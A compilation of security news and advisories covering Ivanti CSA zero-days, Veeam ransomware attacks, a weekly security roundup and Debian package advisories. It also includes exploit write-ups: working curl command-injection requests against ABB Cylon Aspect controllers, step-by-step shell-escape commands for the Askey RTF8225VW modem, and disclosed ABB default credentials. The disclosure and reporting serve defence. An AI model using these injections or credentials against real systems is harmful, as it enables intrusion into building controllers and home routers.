Suspected nation-state actors are spotted stringing together three different zero-days in the Ivanti Cloud Services Application to gain persistent access to a targeted system.

Source: Kristoffer Tripplaar via Alamy Stock Photo

A deft chaining together of three separate zero-day flaws in Ivanti's Cloud Service Appliance allowed a particularly potent cyberattacker to infiltrate a target network and execute malicious actions, leading researchers to conclude a nation-state actor was actively targeting these vulnerable systems.

Fortinet's FortiGuard Labs published its findings, warning that any organization running Ivanti's CSA version 4.6 and prior without taking necessary remediation precautions is vulnerable to this method of attack.

The details of the newly uncovered attack chain come amid the announcement of a bevy of additional security flaws in Ivanti's CSA also under active exploit.

"The advanced adversaries were observed exploiting and chaining zero-day vulnerabilities to establish beachhead access in the victim's network," Fortinet's report said. "This incident is a prime example of how threat actors chain zero-day vulnerabilities to gain initial access to a victim’s network."

The three specific Ivanti CSA flaws used in the attack were a command injection flaw in the DateTimeTab.php resource tracked as CVE-2024-8190, a critical path traversal vulnerability in the /client/index.php resource tracked as CVE-2024-8963, and an unauthenticated command injection vuln tracked as CVE-2024-9380 affecting reports.php.

Once initial access was established using the path traversal bug, the threat group was able to exploit the command injection flaw in the resource reports.php to drop a Web shell. The group exploited a separate SQL injection flaw on Ivanti's backend SQL database server (SQLS) tracked as CVE-2024-29824 to gain remote execution on the SQLS system, the researchers noted.

After Ivanti released a patch for the command injection flaw, the attack group acted to ensure other adversaries do not follow them onto the compromised systems. "On September 10, 2024, when the advisory for CVE-2024-8190 was published by Ivanti, the threat actor, still active in the customer's network, 'patched' the command injection vulnerabilities in the resources /gsb/DateTimeTab.php, and /gsb/reports.php, making them unexploitable," the FortiGuard Labs team added in the report. "In the past, threat actors have been observed to patch vulnerabilities after having exploited them, and gained foothold into the victim's network, to stop any other intruder from gaining access to the vulnerable asset(s), and potentially interfering with their attack operations."

In this instance, analysts suspected the group was trying to use sophisticated techniques to maintain access, including launching a DNS tunneling attack via PowerShell, and dropping a Linux kernel object rootkit on the compromised CSA system.

"The likely motive behind this was for the threat actor to maintain kernel-level persistence on the CSA device, which may survive even a factory reset," Fortinet researchers said.

Serious Adversaries Circle Ivanti CSA Zero-Day Flaws

Debian Linux Security Advisory 5791-1 - Elyas Damej discovered that a sandbox mechanism in ReportLab, a Python library to create PDF documents, could be bypassed which may result in the execution of arbitrary code when converting malformed HTML to a PDF document.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5791-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffOctober 13, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : python-reportlabCVE ID         : CVE-2023-33733Elyas Damej discovered that a sandbox mechanism in ReportLab, a Pythonlibrary to create PDF documents, could be bypassed which may result inthe execution of arbitrary code when converting malformed HTML to a PDFdocument.For the stable distribution (bookworm), this problem has been fixed inversion 3.6.12-1+deb12u1.We recommend that you upgrade your python-reportlab packages.For the detailed security status of python-reportlab please refer toits security tracker page at:https://security-tracker.debian.org/tracker/python-reportlabFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmcMDm4ACgkQEMKTtsN8Tja2Lw//RW9W1X/NuzRQKUmUf+5jPBY48jOsfoOCjJTEUXSjptjP0m5QA/xsd78b2C4Eq9SooafXXPufiJGbtYs0CP4Xvuok/G1rPkgpcZPYQ2m9Bbcrp6JAMrb/CeAumsuBCQc7IgaCz8AkMh81JxNy5CqVvh9EJdKgZYyviT7wa5Bqyx6TBicfQHdZ8bNk6xQqh0S3+rzkKoau9YE0rYWRZ/AOLki5PUGqsEJOzXFpwn4Ahvk/pBCTra7E/k0oL2bUmVSFtTJcdowtofbh/c9K8ZQmI0k8CMU82LU4cTaV6UjK+498JWpQLl6uq5RISKppR3I5tsk+DVAve4ek1yAyXNrgscm1u62IxSDQpuBc3GgW6cN5nrKYHoALdnjiRD+8OSChTIOpbVSZ4y9tUFU7mHRoVkne4pNohujV/8M1umupJ108nXA34avR+B7DsResI70m19/ocLR5uH1v/rGO4FUrSfAKgOYBR8ryO/YcbDROixyOHFN7vxCUxXF3UPc3uPVuQilHOCi0w+S4JxcLywFXoDIj1qtGlzKA9rtAMA6okHILJKCy43lEo+36nr0WZMZuF7kDQLPkpb1+6zf3Mxwj8QrpRFCT+DYyLfg5MLYLM4Trbavtpk/faXQoP+pLMfjIaq8Nrd7/UOXFQXWFSUh8YwOm99je9zr1Am35zftZnNU==MICC-----END PGP SIGNATURE-----

Debian Security Advisory 5791-1

ABB Cylon Aspect version 3.08.00 suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the PROXY HTTP POST parameter called by the yumSettings.php script.

  
ABB Cylon Aspect 3.08.00 (yumSettings.php) Remote Code Execution

Vendor: ABB Ltd.  
Product web page: https://www.global.abb  
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio  
                  Firmware: <=3.08.00

Summary: ASPECT is an award-winning scalable building energy management  
and control solution designed to allow users seamless access to their  
building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller suffers from an authenticated OS command  
injection vulnerability. This can be exploited to inject and execute arbitrary  
shell commands through the 'PROXY' HTTP POST parameter called by the yumSettings.php  
script.

Tested on: GNU/Linux 3.15.10 (armv7l)  
           GNU/Linux 3.10.0 (x86_64)  
           GNU/Linux 2.6.32 (x86_64)  
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz  
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz  
           PHP/7.3.11  
           PHP/5.6.30  
           PHP/5.4.16  
           PHP/4.4.8  
           PHP/5.3.3  
           AspectFT Automation Application Server  
           lighttpd/1.4.32  
           lighttpd/1.4.18  
           Apache/2.2.15 (CentOS)  
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)  
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
                            @zeroscience

Advisory ID: ZSL-2024-5841  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5841.php

21.04.2024

--

$ cat project

                 P   R   O   J   E   C   T

                        .|  
                        | |  
                        |'|            ._____  
                ___    |  |            |.   |' .---"|  
        _    .-'   '-. |  |     .--'|  ||   | _|    |  
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |  
     |' | |.    |    ||       | |   |  |    ||      |  
 ____|  '-'     '    ""       '-'   '-.'    '`      |____  
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░    
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░   
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░   
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ 

$ curl -X POST "http://192.168.73.31/yumSettings.php" \  
> -H "Cookie: PHPSESSID=xxx" \  
> -d "CMD=set&PROXY=;id>/tmp/blah"  
Set proxy called - no proxy given:  
$   
$ curl -X POST "http://192.168.73.31/caldavUtil.php" \  
> -d "command=postFooter&Footer=%60cat /tmp/blah%60"  
Set footer to uid=33(www-data) gid=33(www-data) groups=33(www-data):

ABB Cylon Aspect 3.08.00 yumSettings.php Command Injection

Debian Linux Security Advisory 5790-1 - It was discovered that DOMPurify, a sanitizer for HTML, MathML and SVG was susceptible to nesting-based mXSS.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5790-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffOctober 13, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : node-dompurifyCVE ID         : CVE-2024-47875It was discovered that DOMPurify, a sanitizer for HTML, MathML and SVG wassusceptible to nesting-based mXSS.For the stable distribution (bookworm), this problem has been fixed inversion 2.4.1+dfsg+~2.4.0-2.We recommend that you upgrade your node-dompurify packages.For the detailed security status of node-dompurify please refer toits security tracker page at:https://security-tracker.debian.org/tracker/node-dompurifyFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmcMCGEACgkQEMKTtsN8TjZW5g//Uc2ZeYTX4O8kHZ9IHHL7v9n6pxPG9MLYgiMt11YSs5k6qVT20NvqfWWyN9ZNQkBCtYpKRO3wym5AcfR9UsZxVh3AlT8Q+Y7lHBYxiaQw82ygNQT2nAU32wBSMHnZvjHEAdH/iZWeR2VROVHjwR7bU9cbzc2/dVt1W7WJTLPY8lAqAAJ5D4/6Nlcb1JMwupP1XIW26gSYBGx+RXuKitSr1jKBoraDtAGUtpZQMP7JwKXt+WSLe4mStXwQmQhMkmNd28sonJVAEl/EjvZq1KuEONlj5doPMtMC9eU7HBtXu6b2JoPVyO6FZnx76lMqT+JV9VIqj1MfJofLSv4kT8PfM18KaNHBqtiR370D0q6gxfQxIibvu4WXPmG8CNw/ew4LRwswQMQPSscEGdo8jz3WKhKnLMB6HRWg0m9LMJXQcmNLPiAS8NIcOSDtK8sQC8ODIjR1lYzetnu7Y6o69KWdreFVlHgaWqROfBtxmQ0cf4vBQchZd3cCRsFHtPQ2xsNsbIQoJhst2XzJsNVlgcB78qMiKfc7fsZh7/Uy0oq2jclSA1nWQUoszFblTVCn44fLIS97bn2WggiAqUymBBSyAGeZp//6CuoYik62ARHW5tYXvsa1oq9/d/I5RcBMbNHn2VNyxmzpnkbaFFYS/Sz86ihL17Ao7IOD8ssvaHzGeTw==lKMx-----END PGP SIGNATURE-----

Debian Security Advisory 5790-1

Debian Linux Security Advisory 5789-1 - Multiple security issues were discovered in Thunderbird, which could result in the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5789-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffOctober 12, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : thunderbirdCVE ID         : CVE-2024-9392 CVE-2024-9393 CVE-2024-9394 CVE-2024-9401                  CVE-2024-9680Multiple security issues were discovered in Thunderbird, which couldresult in the execution of arbitrary code.For the stable distribution (bookworm), these problems have been fixed inversion 1:115.16.0esr-1~deb12u1.We recommend that you upgrade your thunderbird packages.For the detailed security status of thunderbird please refer toits security tracker page at:https://security-tracker.debian.org/tracker/thunderbirdFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmcKScgACgkQEMKTtsN8TjZxqg/+IotH08Pw5gFZxPLZ0XmP72798ftJNHzws+5sBYSf66i/W3vcWy51fHZUMSzQ/rJE0b/FappKSzBVrKZyrm1JWvkEOMGa72fUTXcGcbvVn68XbFrZCYHs5ec/ErU3j++tQeKXCIt6JOmwZlbz0gEbFv3W3JUpPpkrp+8ZnWHd8e6dmG56yYfzNATIMAb25Emw1W8aSivopokv96X5FpuzCpVllzgJgwURCQdZhbLaoLfoHWhHPSsRIK2MCxN3isjS/b41D1wHM9dO2gQ7Yp1d4rWMooSk2fKG5hub2lZbJ3SmVmf0UQcQssXsBy+FTU9g+01VUXwKVUKpmJ9TKakGdwaBBlHo1Y5OzAJf0XZl2TrTGCbsAn+wjLH5TxX2HMiBIiEKRn2QkJP4nzExWVy2Xj07XpuI9YMnP4ZAxjNJkZXcE9kDgL9x6qrXW9Lh4W2APbW9WG5o3J+HZLs7/7dv8jbhbtekaAjVFK6Ex09iTB0HNo3GBoFgwTA0MloSPy933aYhyZh1LA/h7OjJ9+mHUQdjAe8bDyRVNItX1U0/E34KA2KwbK9fis/DIxNAQzdKYyGoFrjnT3rnv/gPMGB+5cbhNyIo3lWnKMqigu5xJJMhAbBmrvP15cIo2jF6oDwpAFh5a9q35ElTOOq5CJBqIg92r95DlLB6Em4iMM3t/gs==CztN-----END PGP SIGNATURE-----

Debian Security Advisory 5789-1

The Vivo Fibra Askey RTF8225VW modem suffers from an input validation vulnerability that allows for full escalation to a functioning shell once logged in and using the restricted aspsh shell.

    ---# Exploit 1## Documentation on the Vivo Fibra Modem ExploitI discovered an exploit that allows access to the `sh` shell on the Vivo Fibra modem. This method essentially involves terminating the `aspsh` shell and invoking `sh` using the output of `cat /dev/null`. Using the pipe (`|`) is crucial for this exploit, it is the base of the exploit.## Known Affected Devices- **Model**: Askey RTF8225VW    - **Software Version**: BR_SG_g1.13_RTF_TEF004_V2.35    - **Revision**: REV3    - **CLI Version**: Reduced_CLI_HGU_v26 (Vivo Fibra firmware)    - **System Info**: Linux (none) 4.4.115  ## The ExploitTo begin, access the modem by connecting to `support@{modem's IP}` via SSH. It does not matter if the connection is local or public, as SSH port (22) is open to the internet. The `support` user has privileged access, but the password is the same as the admin password.You will need to enter the password, which is typically an 8-digit mix of letters and numbers. Once logged in, you will be greeted with `aspsh`, a very limited shell designed for technical services. Its purpose is to prevent you from using `sh` or `bash` for security reasons.The critical part begins here: the only Unix-like programs you can execute are `ls`, `top`, `cat`, and `free`. There are other programs available in `aspsh`, but they are not useful for this exploit.## How to Execute the ExploitIn `aspsh`, enter the following command:```aspshcat /dev/null | ps | grep aspsh```This command helps you discover the process ID of `aspsh -k`. The `cat /dev/null` command returns nothing, allowing you to execute `ps` and `grep aspsh`. The output should look something like this:```2298 support  13612 S    aspsh -k27492 support  13608 S    -aspsh31961 support   3308 S    sh -c cat /dev/null | ps | grep aspsh31964 support   3312 S    grep aspsh```Once you have identified the process ID, you can terminate the `aspsh` loop that restricts your access.Next, run the command:```aspshcat /dev/null | kill 2298 && sh```In this command, `cat /dev/null` still returns nothing, allowing you to use its output to kill the `aspsh -k` process. The `&& sh` part then invokes `sh` in its place.And that's it! You now have access to `sh`, providing you with unlimited possibilities for manipulating your modem.## Why This Exploit Is DangerousIf someone with malicious intent exploits this vulnerability, they could use tools like Wireshark or similar applications to monitor network activity. They could also execute destructive commands like `rm -rf /`, effectively destroying the system and rendering the hardware essentially unusable, with no option to reset it.---

Vivo Fibra Askey RTF8225VW Command Execution

A suspected nation-state adversary has been observed weaponizing three security flaws in Ivanti Cloud Service Appliance (CSA) a zero-day to perform a series of malicious actions.
That's according to findings from Fortinet FortiGuard Labs, which said the vulnerabilities were abused to gain unauthenticated access to the CSA, enumerate users configured in the appliance, and attempt to access the

Network Security / Vulnerability

A suspected nation-state adversary has been observed weaponizing three security flaws in Ivanti Cloud Service Appliance (CSA) a zero-day to perform a series of malicious actions.

That's according to findings from Fortinet FortiGuard Labs, which said the vulnerabilities were abused to gain unauthenticated access to the CSA, enumerate users configured in the appliance, and attempt to access the credentials of those users.

"The advanced adversaries were observed exploiting and chaining zero-day vulnerabilities to establish beachhead access in the victim's network," security researchers Faisal Abdul Malik Qureshi, John Simmons, Jared Betts, Luca Pugliese, Trent Healy, Ken Evans, and Robert Reyes said.

The flaws in question are listed below -

*   **CVE-2024-8190** (CVSS score: 7.2) - A command injection flaw in the resource /gsb/DateTimeTab.php
*   **CVE-2024-8963** (CVSS score: 9.4) - A path traversal vulnerability on the resource /client/index.php
*   **CVE-2024-9380** (CVSS score: 7.2) - An authenticated command injection vulnerability affecting the resource reports.php

In the next stage, the stolen credentials associated with gsbadmin and admin were used to perform authenticated exploitation of the command injection vulnerability affecting the resource /gsb/reports.php in order to drop a web shell ("help.php").

"On September 10, 2024, when the advisory for CVE-2024-8190 was published by Ivanti, the threat actor, still active in the customer's network, 'patched' the command injection vulnerabilities in the resources /gsb/DateTimeTab.php, and /gsb/reports.php, making them unexploitable."

"In the past, threat actors have been observed to patch vulnerabilities after having exploited them, and gained foothold into the victim's network, to stop any other intruder from gaining access to the vulnerable asset(s), and potentially interfering with their attack operations."

SQLi vulnerability exploitation

The unknown attackers have also been identified abusing CVE-2024-29824, a critical flaw impacting Ivanti Endpoint Manager (EPM), after compromising the internet-facing CSA appliance. Specifically, this involved enabling the xp\_cmdshell stored procedure to achieve remote code execution.

It's worth noting that the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog in the first week of October 2024.

Some of the other activities included creating a new user called mssqlsvc, running reconnaissance commands, and exfiltrating the results of those commands via a technique known as DNS tunneling using PowerShell code. Also of note is the deployment of a rootkit in the form of a Linux kernel object (sysinitd.ko) on the compromised CSA device.

"The likely motive behind this was for the threat actor to maintain kernel-level persistence on the CSA device, which may survive even a factory reset," Fortinet researchers said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Nation-State Attackers Exploiting Ivanti CSA Flaws for Network Infiltration

Threat actors are actively attempting to exploit a now-patched security flaw in Veeam Backup & Replication to deploy Akira and Fog ransomware.
Cybersecurity vendor Sophos said it has been tracking a series of attacks in the past month leveraging compromised VPN credentials and CVE-2024-40711 to create a local account and deploy the ransomware.
CVE-2024-40711, rated 9.8 out of 10.0 on the

Ransomware / Vulnerability

Threat actors are actively attempting to exploit a now-patched security flaw in Veeam Backup & Replication to deploy Akira and Fog ransomware.

Cybersecurity vendor Sophos said it has been tracking a series of attacks in the past month leveraging compromised VPN credentials and CVE-2024-40711 to create a local account and deploy the ransomware.

CVE-2024-40711, rated 9.8 out of 10.0 on the CVSS scale, refers to a critical vulnerability that allows for unauthenticated remote code execution. It was addressed by Veeam in Backup & Replication version 12.2 in early September 2024.

Security researcher Florian Hauser of Germany-based CODE WHITE has been credited with discovering and reporting security shortcomings.

"In each of the cases, attackers initially accessed targets using compromised VPN gateways without multifactor authentication enabled," Sophos said. "Some of these VPNs were running unsupported software versions."

"Each time, the attackers exploited VEEAM on the URI /trigger on port 8000, triggering the Veeam.Backup.MountService.exe to spawn net.exe. The exploit creates a local account, 'point,' adding it to the local Administrators and Remote Desktop Users groups."

In the attack that led to the Fog ransomware deployment, the threat actors are said to have drop the ransomware to an unprotected Hyper-V server, while using the rclone utility to exfiltrate data. The other ransomware deployments were unsuccessful.

The active exploitation of CVE-2024-40711 has prompted an advisory from NHS England, which noted that "enterprise backup and disaster recovery applications are valuable targets for cyber threat groups."

The disclosure comes as Palo Alto Networks Unit 42 detailed a successor to INC ransomware named Lynx that has been active since July 2024, targeting organizations in retail, real estate, architecture, financial, and environmental services sectors in the U.S. and U.K.

The emergence of Lynx is said to have been spurred by the sale of INC ransomware's source code on the criminal underground market as early as March 2024, prompting malware authors to repackage the locker and spawn new variants.

"Lynx ransomware shares a significant portion of its source code with INC ransomware," Unit 42 said. "INC ransomware initially surfaced in August 2023 and had variants compatible with both Windows and Linux."

It also follows an advisory from the U.S. Department of Health and Human Services (HHS) Health Sector Cybersecurity Coordination Center (HC3) that at least one healthcare entity in the country has fallen victim to Trinity ransomware, another relatively new ransomware player that first became known in May 2024 and is believed to be a rebrand of 2023Lock and Venus ransomware.

"It is a type of malicious software that infiltrates systems through several attack vectors, including phishing emails, malicious websites, and exploitation of software vulnerabilities," HC3 said. "Once inside the system, Trinity ransomware employs a double extortion strategy to target its victims."

Cyber attacks have also been observed delivering a MedusaLocker ransomware variant dubbed BabyLockerKZ by a financially motivated threat actor known to be active since October 2022, with targets primarily located in the E.U. countries and South America.

"This attacker uses several publicly known attack tools and living-off-the-land binaries (LoLBins), a set of tools built by the same developer (possibly the attacker) to assist in credential theft and lateral movement in compromised organizations," Talos researchers said.

"These tools are mostly wrappers around publicly available tools that include additional functionality to streamline the attack process and provide graphical or command-line interfaces."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Critical Veeam Vulnerability Exploited to Spread Akira and Fog Ransomware

Plus: New details emerge in the National Public Data breach, Discord gets blocked in Russia and Turkey over alleged illegal activity on the platform, and more.

The Internet Archive is under attack. On top of multiple extinction-threatening lawsuits against the organization that created and maintains the Wayback Machine, hackers this week breached the Internet Archive, stole 31 million user account details, and defaced its website—all while archive.org struggled to stay online thanks to a barrage of distributed denial-of-service attacks. As of Friday, the site remained “temporarily offline.”

In a dark twist of fate, a judge this week cleared the way for the US Treasury Department to take possession of 69,000 bitcoins stolen from the Silk Road dark web market; meanwhile, the former IRS investigator who personally seized the bitcoins, Tigran Gambaryan, remains in a Nigerian jail cell on charges related to the actions of his current employer, embattled crypto exchange Binance. Members of Congress and other officials have called for the US government to do more to ensure Gambaryan’s release given his direct role in a series of major criminal cases and in pioneering crypto-investigation techniques. As for those seized Silk Road bitcoins, they are now worth $4.4 billion and will likely be auctioned off.

Security researchers this week detailed a pernicious malware that worms its way into Linux machines and uses a variety of techniques to evade detection. Dubbed Perfctl, the malware hides itself by creating files that match those typically found within Linux instances, using tricks to prevent admin tools from recording its activities, and more. All of this is done with the goal of remaining on an infected machine to keep carrying out a variety of malicious activities. Researchers estimate that millions of Linux devices could be vulnerable.

Finally, we dissected the ways in which Google’s decision to _not_ kill third-party tracking cookies in its Chrome browser could continue to impact your privacy.

And that’s not all. Each week, we round up the security and privacy news we didn’t cover in depth ourselves. Click the headlines to read the full stories. And stay safe out there.

Police use of honeypots to catch cybercriminals red-handed is nothing new. But creating an entirely new cryptocurrency to catch pump-and-dump schemers? Now that’s something special. The US Department of Justice revealed this week that the FBI made a new Ethereum-based crypto token, NexFundAI, specifically to trick people who manipulate crypto markets and take them down.

While the investigation ultimately resulted in charges against 18 people and other entities for alleged fraud and crypto market manipulation, the blast radius of the scheme also impacted some regular retail investors who are not accused of any crimes, although US officials did not provide details about those investments. A US prosecutor involved in the case told reporters, however, that the investigation netted a total of $25 million in funds, which will be returned to investors. Trading on NexFundAI has since been disabled.

**National Public Data Files for Bankruptcy After Catastrophic Breach**

National Public Data, a data broker based in Florida, is having a bad year. In August, hackers published 2.9 billion records stolen from NPD last December that included names, mailing addresses, phone numbers, email addresses, and Social Security numbers—a giant trove the hackers claim impacted “the entire population of USA, CA, and UK.” Then came the inevitable lawsuits against NPD, which is now filing for bankruptcy. Those proceedings have revealed new details, including the fact that NPD is run by a single person, Salvatore Verini, Jr, who operated the business out of his home on around $2,500 worth of equipment. A document filed in a bankruptcy court by one of NPD’s debtors states that the breach may have impacted “hundreds of millions” of people.

**Russia and Turkey Block Discord**

Discord users in Russia and Turkey this week found they were suddenly unable to connect to the online chat application. Authorities in both countries later revealed that Discord had been blocked for allegedly facilitating illegal activity. Russia’s internet regulator, Roskomnadzor, said in a statement the block “is necessary to prevent the use of the messenger for terrorist and extremist purposes, the recruitment of citizens for their commission, the sale of drugs, in connection with the placement of illegal information.” Turkish authorities, meanwhile, banned the messaging app after a court decision involving child abuse material that was allegedly hosted on Discord servers. According to BleepingComputer, some Discord users in those countries were able to access the app using a VPN that routed their connections through foreign IP addresses—potentially good news for Russian troops who were reportedly disrupted by the block.

**Police Secretly Use Face Recognition Tech to Link People to Crimes**

Law enforcement use of face recognition technology to pin crimes on Americans is far more widespread than previously known, according to a newly published investigation by The Washington Post. Records obtained by the Post found that police in 15 states used face recognition tools in “more than 1,000 investigations over the past four years.” Despite its apparent widespread use, police departments frequently seek to hide their use of the technology, which has been found to inaccurately identify people who are then charged with crimes they did not commit. As an assistant public defender in Minnesota told Post reporters, police likely obscure their use of face recognition because they “want to avoid the litigation surrounding reliability of the technology.”

The FBI Made a Crypto Coin Just to Catch Fraudsters

ABB Cylon Aspect version 3.07.02 uses a weak set of default administrative credentials that can be guessed in remote password attacks and used to gain full control of the system.

  
ABB Cylon Aspect 3.07.02 (user.properties) Default Credentials

Vendor: ABB Ltd.  
Product web page: https://www.global.abb  
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio  
                  Firmware: <=3.07.02

Summary: ASPECT is an award-winning scalable building energy management  
and control solution designed to allow users seamless access to their  
building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller uses a weak set of default administrative  
credentials that can be guessed in remote password attacks and gain full  
control of the system.

Tested on: GNU/Linux 3.15.10 (armv7l)  
           GNU/Linux 3.10.0 (x86_64)  
           GNU/Linux 2.6.32 (x86_64)  
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz  
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz  
           PHP/7.3.11  
           PHP/5.6.30  
           PHP/5.4.16  
           PHP/4.4.8  
           PHP/5.3.3  
           AspectFT Automation Application Server  
           lighttpd/1.4.32  
           lighttpd/1.4.18  
           Apache/2.2.15 (CentOS)  
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)  
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
                            @zeroscience

Advisory ID: ZSL-2024-5840  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5840.php

21.04.2024

--

$ cat project

                 P   R   O   J   E   C   T

                        .|  
                        | |  
                        |'|            ._____  
                ___    |  |            |.   |' .---"|  
        _    .-'   '-. |  |     .--'|  ||   | _|    |  
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |  
     |' | |.    |    ||       | |   |  |    ||      |  
 ____|  '-'     '    ""       '-'   '-.'    '`      |____  
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░    
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                              
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░   
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░   
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               

                                                                                                               $ cat /home/MIX_CMIX/htmlroot/user.properties  
#Users  
#Mon Mar 20 13:30 EDT 2016  
guest=6775657374  
aamuser=64656661756c74

Using Utils::Hex2String in AuthSession.php:

guest:guest  
aamuser:default

Tag

#linux